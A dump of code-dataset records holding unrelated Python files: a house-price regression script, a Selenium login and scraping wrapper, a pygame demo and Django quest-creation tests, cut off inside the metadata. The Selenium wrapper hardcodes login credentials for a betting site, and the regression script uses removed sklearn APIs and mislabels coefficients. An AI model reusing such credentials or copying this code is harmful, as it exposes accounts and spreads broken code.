sm.OLS(y, X[columnList_new]).fit()\r\n adjR2_after = temp_OLS.rsquared_adj\r\n print('before', adjR2_before)\r\n print('after', adjR2_after, '\\n')\r\n if adjR2_before > adjR2_after:\r\n return columnList\r\n else:\r\n columnList.remove(ind) \r\n return columnList\r\n\r\ndef PolyFeatureNames(featureNames):\r\n # interaction features\r\n featureNames = ['intercept'] + featureNames \r\n polyFeatureNames = []; \r\n for i,x in enumerate(featureNames):\r\n for y in featureNames[i:]:\r\n if (x == 'intercept'):\r\n polyFeatureNames.append(y)\r\n elif (x==y):\r\n polyFeatureNames.append((y+'_Square'))\r\n else:\r\n polyFeatureNames.append((x+'_'+y))\r\n return polyFeatureNames\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from sklearn.grid_search import GridSearchCV\r\nfrom sklearn.cross_validation import ShuffleSplit\r\nfrom sklearn.metrics import make_scorer\r\nfrom sklearn.metrics import r2_score\r\n\r\ndef performance_metric(y_true, y_predict):\r\n score = r2_score(y_true, y_predict)\r\n return score\r\n\r\n\r\ndef fit_model(X,y):\r\n cv_sets = ShuffleSplit(X.shape[0],n_iter=10,\r\n test_size=0.20,\r\n random_state=1234)\r\n ridgeModel = Ridge()\r\n params = {'alpha':list(range(0,5)),\r\n 'solver' : ('auto', \r\n 'svd', \r\n 'cholesky', \r\n 'lsqr', \r\n 'sparse_cg', \r\n 'sag', \r\n 'saga')}\r\n scoring_func = make_scorer(performance_metric)\r\n grid = GridSearchCV(ridgeModel,params,scoring_func,cv=cv_sets)\r\n grid = grid.fit(X,y)\r\n return grid.best_estimator_\r\n\r\nhouse = StartOverDf()\r\n#plt.figure(figsize=(15,10))\r\n#sns.heatmap(house.corr(), annot=True, cmap='coolwarm')\r\nmax_date = max(house.date)\r\nhouse['Age_sold'] = house['date'].apply(lambda x: ((max_date - x).days))\r\nhouse['House_Built_Age'] = 2015-house['yr_built']\r\nhouse['House_Renovated_Age'] = 2015-house['yr_renovated']\r\nhouse['Tot_Bathrooms'] = house.bathrooms * house.bedrooms\r\nhouse['Price_Sqft'] = house.price / house.sqft_living15\r\nhouse['Price_Sqft_lot'] = house.price / house.sqft_lot15\r\ndel(house['bathrooms'])\r\nhouse.at[house.index[house.bedrooms ==33],'bedrooms'] = 3\r\nhouse.at[house.index[house.bedrooms ==11],'bedrooms'] = 3\r\n\r\n\r\nhouse= pd.get_dummies(house, columns =['view'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['grade'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['zipcode'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['condition'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['floors'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['bedrooms'], drop_first=True)\r\n# sqft_living and lot areas have changed even though house is not renovated\r\n# drop older coloumns considering 15 data as the latest and accurate\r\n\r\n\r\nX = house.drop(['price','date','sqft_living','sqft_lot','sqft_above','sqft_basement','yr_built','yr_renovated'], axis=1)\r\ny = house.price\r\n\r\n\r\n# Stats model\r\nX['intercept'] = 1\r\nres = BackwardElimination(X,y,0.05)\r\n\r\n#regressor_OLS = sm.OLS(y, X).fit()\r\n#regressor_OLS.summary()\r\n\r\n#regressor_OLS.pvalues\r\n#res.remove('intercept')\r\n\r\nXpoly = poly.fit_transform(X[res])\r\n#polyFeatureNames = PolyFeatureNames(X.columns.tolist())\r\npolyFeatureNames = PolyFeatureNames(res)\r\n#polyFeatureNames = PolyFeatureNames(['House_Renovated_Age','tot_bathrooms'])\r\n#Xpoly.shape\r\nXpolyDf = pd.DataFrame(Xpoly, columns=polyFeatureNames)\r\n#X = XpolyDf\r\n\r\n#zip_unique = list(set(X.zipcode))\r\n\r\n#from statsmodels.stats.multicomp import pairwise_tukeyhsd\r\n#output = pairwise_tukeyhsd(y,X.zipcode)\r\n#output.summary()\r\n#df = pd.DataFrame(output.summary())\r\n#df = pd.DataFrame(data=output._results_table.data[1:], columns=output._results_table.data[0])\r\n#df1 = df[df.reject == False]\r\n#output.plot_simultaneous()[0]\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nlm = LinearRegression()\r\nfrom sklearn.model_selection import train_test_split\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm.fit(X_train, y_train)\r\ncoefMetrics = pd.DataFrame(index=X_train.columns, data=lm.coef_)\r\nR2_train = lm.score(X_train, y_train)\r\nR2_test = lm.score(X_test, y_test)\r\ny_pred = lm.predict(X_test)\r\nadjR2_train = AdjustedRSquare(lm,X_train,y_train)\r\nadjR2_test = AdjustedRSquare(lm,X_test,y_test)\r\n\r\n\r\nfrom sklearn.linear_model import Lasso\r\nlm1 = Lasso(alpha=1, max_iter=5000)\r\nfrom sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train1 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test1 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\nfrom sklearn.linear_model import Ridge\r\nlm1 = Ridge(alpha=1,max_iter=5000, solver='svd')\r\n#from sklearn.model_selection import cross_validate as cv\r\nfrom sklearn import cross_validation as cv\r\n#from sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train2 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test2 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\n#best_estimate = fit_model(X_train,y_train)\r\n#best_estimate\r\n#Ridge(alpha=1, copy_X=True, fit_intercept=True, max_iter=None,\r\n# normalize=False, random_state=None, solver='svd', tol=0.001)\r\n#adjR2_train = 0.9439\r\n#adjR2_test = 0.9419\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "house_EDA_11112018.py", "file_name": "house_EDA_11112018.py", "file_ext": "py", "file_size_in_byte": 8094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 48, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 48, "usage_type": "name"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 55, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 55, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.ShuffleSplit", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 186, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 203, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "call"}]}
+{"seq_id": "545889766", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n### A basic wrapper to selenium for scraping data\n## - driver - the selenium web browser driver\n## - username - username for login\n## - password - password for login\n## - url_home - The url to navigate to when the browser is created\n## - url_login - The url to use when we login.\n## - url_post_login - The url to navigate to after login\n\n## - actions - A list of actions to do at given urls.\n\n## - get_url() - get current url\n## - set_url() - Navigate to a new url\n\n\n\n### An object that can describe anything. \n### It accepts any parameter to initialize,\n### including type, a variable that can be used to better describe this object\nclass AbstractObject(dict):\n\n \n def __init__(self, **kwargs):\n for key, value in kwargs.items():\n self.__setattr__(key, value)\n \n def __str__(self):\n string = \"<\" + self.type + ': '\n for variable, value in self.__dict__.items():\n string += variable + \"=\" + str(value) + \", \"\n return string + \">\"\n \n \n \n### An abstract wrapper for selenium. \n### This will allow selenium to preform basic actions, \n### for which there is a list that requires some customization, with some basic navigation.\n### Because we inherit from AbstractObject this class too can be customized and expanded very easily.\n### Adding a key to the _attrs dict will result in a new variable inside the object.\n### A named action list will allow functions to be added on the fly even after creation of an object.\nclass SeleniumHandler(AbstractObject):\n _attrs = {\n 'driver':None, # Selenium webdriver\n 'username':'', # for login\n 'password':'', # for login\n 'url_home':'', # The sites home url\n 'url_login':'', # The url used to login to the site (sometimes can be the same as home url)\n 'url_post_login':'', # The url we want to navigate to after login\n 'nav_time':2, # How long we wait after we go to a new url\n 'actions':{}, # Custom actions called by controller (scraper.py)\n 'is_logged_in': False,\n 'login_action_name': 'Login',\n }\n \n def __init__(self, **kwargs):\n for var, val in SeleniumHandler._attrs.items():\n if var not in kwargs:\n kwargs[var] = val\n \n super(SeleniumHandler, self).__init__(**kwargs)\n if (self.driver):\n self.driver\n \n def add_action(self, action_class):\n action = action_class(self)\n self.actions[action.name] = action\n self.__setattr__(action.name, action)\n print (\"[+] \", action_class.__name__) \n \n def get(self, url):\n if (url == \"\"): return\n self.driver.get(url)\n time.sleep(self.nav_time)\n \n def home(self):\n self.get(self.url_home)\n \n \n ### Call the login action only if there is one.\n ### We can do this from the home page if this site can login from the home site\n ### Otherwise go to login url if there is one.\n \n def login(self, redirect = True):\n results = None\n if self.login_action_name not in self.actions.keys(): return results\n \n # the action here is the login action. It is an object. We can call action.Login() on it.\n action = self.actions[self.login_action_name]\n\n # Login if we are at the home page and we can login from the home page\n if self.is_home() and self.can_login_from_home():\n \n print(\"before action.invoke : \",redirect)\n \n action.invoke(post_login_redirect = redirect)\n \n print(\"after action.invoke : \",redirect)\n \n # Otherwise \n \n else: \n self.get(self.url_login)\n results = action.invoke(post_login_redirect = redirect)\n if (results is not None):\n self.is_logged_in = True\n \n return results\n \n \n def is_home(self): return self.current_url == self.url_home\n def current_url(self): return self.driver.current_url\n def can_login_from_home(self): return self.url_home == self.url_login\n\n\n\n\n\n\n\n\n\n\nclass StrikerdotHandler(SeleniumHandler):\n def __init__(self):\n variables = {\n \"type\":\"Handler\",\n 'driver': webdriver.Firefox(),\n 'username': 'R1036', 'password': 'yeet3',\n 'url_home': 'http://www.strikerdot.com',\n 'url_login': 'http://www.strikerdot.com',\n 'url_post_login': \"https://www.strikerdot.com/sports.html?livebettingEZ=ready?logged=1#!\",\n }\n super(StrikerdotHandler, self).__init__(**variables)\n ", "sub_path": "selenium_handler.py", "file_name": "selenium_handler.py", "file_ext": "py", "file_size_in_byte": 4914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 133, "usage_type": "name"}]}
+{"seq_id": "508619205", "text": "import pygame\nimport math\nimport numpy\n \nclass game:\n def __init__(self):\n self.running = True\n self.size = self.width, self.height = 1280, 720\n self.screen = pygame.display.set_mode(self.size)\n self.bg = (192,192,192)\n\n self.square = [[1,2],[1,4],[-1,4],[-1,2]]\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self.running = False\n \n elif event.type == pygame.KEYDOWN:\n if event.unicode == \"w\":\n for point in self.square:\n point[1] -= 0.01\n elif event.unicode == \"s\":\n for point in self.square:\n point[1] += 0.01\n elif event.unicode == \"d\":\n for point in self.square:\n point[0] -= 0.01\n elif event.unicode == \"a\":\n for point in self.square:\n point[0] += 0.01\n\n elif event.key == pygame.K_ESCAPE:\n self.running = False\n \n elif event.type == pygame.MOUSEMOTION:\n mdir = pygame.mouse.get_rel()[0]\n if mdir > 0:\n for point in self.square:\n temp = point[0]*math.cos(0.01) - (point[1])*math.sin(0.01)\n point[1] = point[0]*math.sin(0.01) + (point[1])*math.cos(0.01)\n point[0] = temp\n elif mdir < 0:\n for point in self.square:\n temp = point[0]*math.cos(-0.01) - (point[1])*math.sin(-0.01)\n point[1] = point[0]*math.sin(-0.01) + (point[1])*math.cos(-0.01)\n point[0] = temp\n\n def loop(self):\n self.screen.fill(self.bg)\n vertex = []\n \n for edge in self.square:\n xpos = self.width/2 + math.atan(edge[0]/edge[1])*2*self.width/math.pi\n hpos = math.atan(1/(edge[0]**2+edge[1]**2)**0.5)*2*self.height/math.pi\n mid = self.height/2\n vertex += [[xpos,mid+hpos],[xpos,mid-hpos]]\n\n vs = len(vertex)\n \n dist = []\n for i in range(0,4):\n dist_x = (self.square[i][0] + self.square[(i+1)%4][0])/2\n dist_y = (self.square[i][1] + self.square[(i+1)%4][1])/2\n dist += [(dist_x**2 + dist_y**2)**0.5]\n\n dist = numpy.argsort(numpy.array(dist))\n \n for i in (2*dist[::-1]):\n if i%4 == 0:\n pygame.draw.polygon(self.screen, [128,128,128], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n else:\n pygame.draw.polygon(self.screen, [96,96,96], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n \n def execute(self):\n pygame.init()\n pygame.event.set_grab(True)\n pygame.key.set_repeat(1,1)\n pygame.mouse.set_visible(False)\n \n while self.running:\n for event in pygame.event.get():\n self.on_event(event)\n \n self.loop()\n pygame.display.flip()\n \n pygame.quit()\n\nkeal = game()\nkeal.execute()\n", "sub_path": "input_demo.py", "file_name": "input_demo.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 36, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 54, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.draw.polygon", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.event.set_grab", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "214926306", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests process for creating a quest.\n\"\"\"\nfrom braces.views import LoginRequiredMixin\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import CreateView\nfrom mock import patch, PropertyMock\nfrom characters.mixins import NoAvailableCharactersMixin\nfrom characters.models import Character\nfrom characters.tests.utils import CharacterUtils\nfrom characters.views import CharacterListView\nfrom quests.models import Quest, Post\nfrom rpg_auth.tests.utils import CreateUserMixin\nfrom world.mixins import LocationFromRequestMixin\nfrom world.models import Location\nfrom world.views import ContinentListView\n\n\nclass SelectLocationTestCase(CreateUserMixin):\n \"\"\"\n Tests that users can create quests\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectLocationTestCase, self).setUp()\n self.character_1 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_location_renders(self):\n \"\"\"\n A view must exist allowing a user to select a location to quest in.\n \"\"\"\n response = self.client.get(reverse('quests:select_location'))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, ContinentListView))\n self.assertTemplateUsed(response, 'quests/select_location.html')\n\n def test_user_must_be_logged_in_to_select_location(self):\n \"\"\"\n A user must be logged in to select the location of a quest.\n \"\"\"\n self.client.logout()\n response = self.client.get(reverse('quests:select_location'))\n self.assertRedirects(response, '{0}?next={1}'.format(\n reverse('rpg_auth:login'), reverse('quests:select_location')\n ))\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_available_characters.return_value.count.return_value = 0\n response = self.client.get(reverse('quests:select_location'))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass SelectCharacterTestCase(CreateUserMixin):\n \"\"\"\n Tests that if the user has selected a location they can also select a character.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectCharacterTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_character_renders(self):\n \"\"\"\n Tests that given a valid location, a user's characters are listed.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CharacterListView))\n self.assertTemplateUsed(response, 'quests/select_character.html')\n self.assertEquals(response.context['location'], self.location_1)\n\n def test_invalid_location_gives_404(self):\n \"\"\"\n Tests if an invalid location is given a 404 is raised.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': 'fake-slug'}))\n self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_object_list_is_only_available_characters(self, patched_available_characters):\n \"\"\"\n The object list should only contain characters that are available.\n \"\"\"\n available_characters = Character.objects.filter(pk=1)\n patched_available_characters.return_value = available_characters\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.context['object_list'], available_characters)\n self.assertTrue(self.character_2 not in response.context['object_list'])\n\n @patch('characters.models.CharacterProfile.has_available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_has_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_has_available_characters.return_value = False\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass CreateQuestTestCase(CreateUserMixin):\n \"\"\"\n Tests that a quest can be created once a user has selected the location and the character to start.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(CreateQuestTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_create_view_renders(self):\n \"\"\"\n The view to create a quest should render.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n )\n )\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CreateView))\n self.assertTrue(issubclass(response.context['view'].__class__, NoAvailableCharactersMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LocationFromRequestMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LoginRequiredMixin))\n self.assertTemplateUsed(response, 'quests/quest_form.html')\n self.assertEquals(response.context['location'], self.location_1)\n self.assertEquals(response.context['character'], self.character_1)\n self.assertEquals(len(response.context['form'].fields), 3)\n\n self.assertIsInstance(response.context['form'].fields['title'], forms.CharField)\n self.assertTrue(response.context['form'].fields['title'].required)\n\n self.assertIsInstance(response.context['form'].fields['description'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['description'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['description'].required)\n\n self.assertIsInstance(response.context['form'].fields['first_post'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['first_post'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['first_post'].required)\n\n def test_invalid_character_gives_404(self):\n \"\"\"\n If an invalid PK is provided for a character a 404 error is returned.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': 999},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_unavailable_character_gives_404(self, patched_available_characters):\n \"\"\"\n If another user's character is provided then a 404 should be raised.\n \"\"\"\n patched_available_characters.return_value = Character.objects.filter(pk=self.character_1.pk)\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_2.pk},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n def test_quests_have_initialise_method(self):\n \"\"\"\n Quests should have an initialise method that sets the character, location\n and the GM.\n \"\"\"\n quest = Quest(title=u'Title', description=u'description')\n quest.initialise(\n gm=self.user.quest_profile,\n first_post=u'first post',\n location=self.location_1,\n character=self.character_1,\n )\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n\n def test_creating_a_quest_sets_first_post_characters_and_location(self):\n \"\"\"\n When a quest is created the logged in user should be set as the GM.\n \"\"\"\n valid_data = {\n 'title': u'Title 1',\n 'description': u'Description 1',\n 'first_post': u'first post',\n }\n response = self.client.post(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n ),\n data=valid_data,\n follow=True,\n )\n quest = Quest.objects.get(pk=1)\n self.assertRedirects(response, quest.get_absolute_url())\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(quest, post.quest)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n message = list(response.context['messages'])[0]\n self.assertEqual('{0} has begun!'.format(u'Title 1'), unicode(message.message))\n self.assertTrue('success' in message.tags)\n\n\nclass QuestDetailViewTestCase(CreateUserMixin):\n \"\"\"\n Tests that there is a detail view for quests.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def test_detail_view_renders(self):\n \"\"\"\n It should be possible to view a quest.\n \"\"\"\n quest = Quest.objects.create(\n title=u'title', description=u'description', slug=u'slug', gm=self.user.quest_profile\n )\n response = self.client.get(reverse('quests:quest_detail', kwargs={'slug': quest.slug},))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.context['object'], quest)\n", "sub_path": "quests/tests/test_create_quests.py", "file_name": "test_create_quests.py", "file_ext": "py", "file_size_in_byte": 11072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 29, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "world.views.ContinentListView", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 50, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 68, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 69, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 69, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 70, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "characters.views.CharacterListView", "line_number": 78, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 86, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 94, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 89, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 100, 